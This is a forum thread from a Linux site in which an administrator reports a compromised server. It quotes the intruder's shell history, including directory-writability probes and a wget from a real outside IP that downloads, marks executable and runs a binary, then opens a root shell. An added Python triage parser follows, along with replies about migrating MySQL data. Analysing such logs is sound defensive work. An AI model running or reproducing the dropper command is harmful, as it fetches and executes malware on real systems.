LINUX.ORG.RU

Hacking


Good afternoon. I received an email from some foreign provider about my IP:

Note: Local timezone is +0100 (CET)
Jan 13 11:29:35 milhouse64 sshd[23013]: reverse mapping checking getaddrinfo for [...] failed - POSSIBLE BREAK-IN ATTEMPT!
Jan 13 11:29:35 milhouse64 sshd[23013]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=... user=root
Jan 13 11:29:37 milhouse64 sshd[23013]: Failed password for root from ... port 2427 ssh2
Jan 13 11:29:39 milhouse64 sshd[23013]: Failed password for root from ... port 2427 ssh2
Jan 13 11:29:41 milhouse64 sshd[23013]: Failed password for root from ... port 2427 ssh2
Jan 13 11:29:43 milhouse64 sshd[23013]: Failed password for root from ... port 2427 ssh2
Jan 13 11:29:46 milhouse64 sshd[23013]: Failed password for root from ... port 2427 ssh2
Jan 13 11:29:47 milhouse64 sshd[23013]: Failed password for root from 9... port 2427 ssh2
Jan 13 11:29:47 milhouse64 sshd[23013]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=... user=root

It gets more interesting. I looked on the server and was horrified:

/bin/busybox cp; /gisdfoewrsfdf mount ;/gisdfoewrsfdf echo -e '\x47\x72\x6f\x70/' > //.nippon; cat //.nippon; rm -f //.nippon
echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon; cat /tmp/.nippon; rm -f /tmp/.nippon
echo -e '\x47\x72\x6f\x70/var/tmp' > /var/tmp/.nippon; cat /var/tmp/.nippon; rm -f /var/tmp/.nippon
echo -e '\x47\x72\x6f\x70/proc' > /proc/.nippon; cat /proc/.nippon; rm -f /proc/.nippon
echo -e '\x47\x72\x6f\x70/sys' > /sys/.nippon; cat /sys/.nippon; rm -f /sys/.nippon
echo -e '\x47\x72\x6f\x70/dev' > /dev/.nippon; cat /dev/.nippon; rm -f /dev/.nippon
echo -e '\x47\x72\x6f\x70/sys/kernel/security' > /sys/kernel/security/.nippon; cat /sys/kernel/security/.nippon; rm -f /sys/kernel/security/.nippon
echo -e '\x47\x72\x6f\x70/dev/shm' > /dev/shm/.nippon; cat /dev/shm/.nippon; rm -f /dev/shm/.nippon
echo -e '\x47\x72\x6f\x70/dev/pts' > /dev/pts/.nippon; cat /dev/pts/.nippon; rm -f /dev/pts/.nippon
echo -e '\x47\x72\x6f\x70/run' > /run/.nippon; cat /run/.nippon; rm -f /run/.nippon
echo -e '\x47\x72\x6f\x70/sys/fs/cgroup' > /sys/fs/cgroup/.nippon; cat /sys/fs/cgroup/.nippon; rm -f /sys/fs/cgroup/.nippon
echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/systemd' > /sys/fs/cgroup/systemd/.nippon; cat /sys/fs/cgroup/systemd/.nippon; rm -f /sys/fs/cgroup/systemd/.nippon
echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpuset' > /sys/fs/cgroup/cpuset/.nippon; cat /sys/fs/cgroup/cpuset/.nippon; rm -f /sys/fs/cgroup/cpuset/.nippon
echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpu,cpuacct' > /sys/fs/cgroup/cpu,cpuacct/.nippon; cat /sys/fs/cgroup/cpu,cpuacct/.nippon; rm -f /sys/fs/cgroup/cpu,cpuacct/.nippon
echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/memory' > /sys/fs/cgroup/memory/.nippon; cat /sys/fs/cgroup/memory/.nippon; rm -f /sys/fs/cgroup/memory/.nippon
echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/devices' > /sys/fs/cgroup/devices/.nippon; cat /sys/fs/cgroup/devices/.nippon; rm -f /sys/fs/cgroup/devices/.nippon
echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/freezer' > /sys/fs/cgroup/freezer/.nippon; cat /sys/fs/cgroup/freezer/.nippon; rm -f /sys/fs/cgroup/freezer/.nippon
echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/net_cls' > /sys/fs/cgroup/net_cls/.nippon; cat /sys/fs/cgroup/net_cls/.nippon; rm -f /sys/fs/cgroup/net_cls/.nippon
echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/blkio' > /sys/fs/cgroup/blkio/.nippon; cat /sys/fs/cgroup/blkio/.nippon; rm -f /sys/fs/cgroup/blkio/.nippon
echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/perf_event' > /sys/fs/cgroup/perf_event/.nippon; cat /sys/fs/cgroup/perf_event/.nippon; rm -f /sys/fs/cgroup/perf_event/.nippon
echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/hugetlb' > /sys/fs/cgroup/hugetlb/.nippon; cat /sys/fs/cgroup/hugetlb/.nippon; rm -f /sys/fs/cgroup/hugetlb/.nippon
echo -e '\x47\x72\x6f\x70/' > //.nippon; cat //.nippon; rm -f //.nippon
echo -e '\x47\x72\x6f\x70/proc/sys/fs/binfmt_misc' > /proc/sys/fs/binfmt_misc/.nippon; cat /proc/sys/fs/binfmt_misc/.nippon; rm -f /proc/sys/fs/binfmt_misc/.nippon
echo -e '\x47\x72\x6f\x70/sys/kernel/debug' > /sys/kernel/debug/.nippon; cat /sys/kernel/debug/.nippon; rm -f /sys/kernel/debug/.nippon
echo -e '\x47\x72\x6f\x70/dev/hugepages' > /dev/hugepages/.nippon; cat /dev/hugepages/.nippon; rm -f /dev/hugepages/.nippon
echo -e '\x47\x72\x6f\x70/dev/mqueue' > /dev/mqueue/.nippon; cat /dev/mqueue/.nippon; rm -f /dev/mqueue/.nippon
echo -e '\x47\x72\x6f\x70/db' > /db/.nippon; cat /db/.nippon; rm -f /db/.nippon
echo -e '\x47\x72\x6f\x70/boot' > /boot/.nippon; cat /boot/.nippon; rm -f /boot/.nippon
/gisdfoewrsfdf cat /bin/echo ;/gisdfoewrsfdf cd /; wget http://217.23.10.181/bins/usb_bus.x86 -O - > usb_bus ; chmod 777 usb_bus ; ./usb_bus ;/gisdfoewrsfdf /gisdfoewrsfdf sudo /bin/sh

And so on, several times. MySQL is running on the server; for now I have stopped it and cut off its internet access, I don't need it there.

As far as I understand, I need to do a mysqldump and wipe the server completely. Can I just copy the database files, without a dump?
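The command history above is a writable-directory probe (write a marker plus the path into a hidden file, read it back, delete it) followed by a download-and-execute stage. As an added triage example, not code from the post, this Python parser pulls out of a constructed sample of the same shape which directories were tested, what was fetched, what was run, and whether a root shell was attempted; the download host in the sample is a TEST-NET placeholder and the helper names are my own.

```python
import re

# Constructed sample in the shape of the history quoted in the post (three of
# the probe lines, then the download stage); the host is a TEST-NET placeholder.
SAMPLE = (
    "/bin/busybox cp; /gisdfoewrsfdf mount ;/gisdfoewrsfdf "
    "echo -e '\\x47\\x72\\x6f\\x70/' > //.nippon; cat //.nippon; rm -f //.nippon\n"
    "echo -e '\\x47\\x72\\x6f\\x70/tmp' > /tmp/.nippon; cat /tmp/.nippon; rm -f /tmp/.nippon\n"
    "echo -e '\\x47\\x72\\x6f\\x70/dev/shm' > /dev/shm/.nippon; cat /dev/shm/.nippon; rm -f /dev/shm/.nippon\n"
    "/gisdfoewrsfdf cat /bin/echo ;/gisdfoewrsfdf cd /; "
    "wget http://203.0.113.10/bins/usb_bus.x86 -O - > usb_bus ; chmod 777 usb_bus ; ./usb_bus ;"
    "/gisdfoewrsfdf /gisdfoewrsfdf sudo /bin/sh"
)

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
# echo -e '<marker><dir>' > <dir>/.nippon : one probe of a candidate directory
ECHO_PROBE = re.compile(r"echo -e '([^']*)' > (\S+)")
# a URL handed to wget/curl within the same command (stops at ; | &)
FETCH = re.compile(r"\b(?:wget|curl)\b[^;|&]*?(https?://\S+)")
# "> NAME ; chmod 777 NAME ; ./NAME" : the fetched payload made executable and run
DROP = re.compile(r"> (\S+) ; chmod 777 \1 ; \./\1")


def decode_echo_arg(arg: str) -> str:
    """Expand the \\xNN escapes the way `echo -e` would, so the marker becomes readable."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), arg)


def triage(history: str) -> dict:
    """Summarise the dropper: marker string, directories tested for writability,
    download URLs (IoCs), binaries executed, and whether a root shell was attempted."""
    marker, probed_dirs = "", []
    for raw, _target in ECHO_PROBE.findall(history):
        # decoded text is "<marker><path>"; the path is the directory being probed
        m = re.match(r"([^/]*)(/.*)", decode_echo_arg(raw))
        if m:
            marker = marker or m.group(1)
            probed_dirs.append(m.group(2))
    return {
        "marker": marker,
        "probed_dirs": probed_dirs,
        "download_urls": FETCH.findall(history),
        "dropped_binaries": DROP.findall(history),
        # `cat /bin/echo` dumps an ELF header; loaders read it to pick the right architecture build
        "arch_fingerprint": "cat /bin/echo" in history,
        "sudo_shell": bool(re.search(r"\bsudo /bin/sh\b", history)),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

Run the same function over the real history to get the list of directories the attacker found writable (the ones where `cat` echoed the marker back) and the URL to block and report.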


Can I just copy the database files, without a dump?

If the new mysql version is exactly the same.

TDrive ★★★★★ ()
Reply to: comment by marrt

If you only copy the database files, then no.

Deleted ()